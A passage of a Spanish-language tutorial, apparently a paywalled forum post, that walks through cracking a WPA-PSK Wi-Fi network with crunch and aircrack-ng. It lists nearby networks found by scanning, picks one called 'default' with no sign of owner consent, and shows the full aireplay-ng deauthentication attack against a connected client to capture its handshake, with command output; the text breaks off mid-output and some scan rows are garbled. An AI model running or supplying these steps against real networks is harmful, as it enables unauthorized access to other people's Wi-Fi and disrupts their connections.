Redes
dijo:
tar -xvzf crunch*.tgz
Entramos al directorio
dijo:
cd crunch
Lo compilamos, por las dudas primero dejo el build-essential por si no lo tienen:
dijo:
apt-get install build-essential
Ahora si, lo compilamos:
dijo:
make
dijo:
make install
Por último copiamos el comando al sbin:
dijo:
cp crunch /usr/sbin/
Voy a darpor sentado que tienen instalado aircrack-ng, pero como soy bueno, les dejo el apt-get por las dudas:
dijo:
apt-get install aircrack-ng
Empezamos !!
Ponemos en modo promiscuo (monitor) nuestra placa (en mi caso la interfaz es aht1, cada cual ponga la suya):
dijo:
airodump-ng ath1
Me aparecen un par de redes:
dijo:
CH 6 ][ Elapsed: 4 s ][ 2010-07-11 23:44
BSSID PWR Beacons#Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1B:113:A9:5D 2 2 0 0 1 54 . WEP WEP dlink-007
00:14:BF:79:8B:3C 5 2 0 0 6 54 WPA2 CCMP PSK PORINGA
00:21:29:EB:57:85 2 0 0 0 6 54 OPN Nazario_w
00:21:29:96:85:0C 9 3 1 0 6 54e WEP WEP Martin
00:1A:70:3D:3D:81 3 2 0 0 6 54 OPN linksys
00:1C:10:2A:C7:99 5 3 0 0 6 54e OPN Nazario_w
00:18:E7:56:26:89 7 4 0 0 6 54 . WPA TKIP PSK default00:26:5A:53:E5:84 4 4 0 0 6 54 WEP WEP AR-RED
00:1D:7E:22:25:22 -1 0 3 1 6 -1 OPN <length:
00:18:E7:61:A9:47 8 3 0 0 6 54 . WPA TKIP PSK ESTUDIO J
00:0A:E5:79:83:E8 1 4 1 0 11 11 WEP WEP CIBERA
00:21:29:72C:32 5 3 0 0 11 54 . WEP WEP linksys
00:0F:A31:9C:5B 21 6 0 0 12 54 . WEP WEP LKSA
00:25:9C:69:97:B7 16 12 0 0 11 54e WPA2 TKIP PSK WIPS
00:0F:A31:67:8A 6 6 0 0 4 54 . WEP WEP Wi-Fi Arn1C:AF7:42:E1:E6 -1 0 0 0 9 -1 <length:
00:15:63:11:69:90 16 10 0 0 9 12e. WEP WEP <length:
00:25:9C:3B:69:28 23 15 0 0 6 54e WEP WEP Apicc
00:40:77:BB:55:03 21 19 0 0 6 54e WPA TKIP PSK dd-wrt
00:21:00:61:B9:12 1 2 0 0 1 54 OPN FT89769
Juro que el ESSID PORINGA no es mío !!
Bueno, sigamos, la que voy a utilizar es "default" que tiene cifrado WPA TKIP PSK:
TKIP:(Temporal Key Integrity Protocol)
PSK: (Pre-Shared Key)
Una vez que tenemos el MAC del AP y el canal, ponemos:
dijo:
airodump-ng -c NUMERODELCANAL --bssid MAC-DEL-AP -w default ath1
En este caso:
dijo:
airodump-ng -c 6 --bssid 00:18:E7:56:26:89 -w default ath1
Ahora airodump sólo va a escuchar ese canal y ese AP.:
dijo:
CH 6 ][ Elapsed: 9 mins ][ 2010-07-11 23:53 ]
BSSID PWR RXQBeacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:E7:56:26:89 9 90 4152 762 5 6 54 . WPA TKIP PSK defau
BSSID STATION PWR Rate Lost Packets Probes
00:18:E7:56:26:89 00:0C:41:7A:77:43 51 11 - 1 42 1102
00:18:E7:56:26:89 00:1F:E1:23:33:40 15 0 - 1 0 61 default
Acá tenemos dos posibles escenarios:
1) Esperar que se conecte un nuevo cliente para adquirir el handshake
2)Desautenticar un cliente ya conectado para que vuelva a conectarse y adquirir el handshake
En este caso vamos a utilizar la segunda opción, anotamos el MAC del AP y el MAC del cliente conectado.
AP: 00:18:E7:56:26:89
Cliente Conectado: 00:0C:41:7A:77:43
Procedemos a desautenticar al cliente mediante este comando:
dijo:
aireplay-ng -0 10 -a MAC-DEL-AP -c MAC-DEL-CLIENTE ath1
En estecaso:
dijo:
aireplay-ng -0 10 -a 00:18:E7:56:26:89 -c 00:0C:41:7A:77:43 ath1
Hace algo así:
dijo:
[root@debian dke]# aireplay-ng -0 10 -a 00:18:E7:56:26:89 -c 00:0C:41:7A:77:43 ath1
23:46:18 Waiting for beacon frame (BSSID: 00:18:E7:56:26:89) on channel 6
23:46:19 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 1|173 ACKs]
23:46:20 Sending 64 directed DeAuth. STMAC:[00:0C:41:7A:77:43] [14|155 ACKs]
23:46:20 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|207 ACKs]
23:46:21 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [11|173 ACKs]
23:46:21 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [31|186 ACKs]
23:46:26 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|240 ACKs]
23:46:27 Sending 64 directed DeAuth. STMAC:...
Regístrate para leer el documento completo.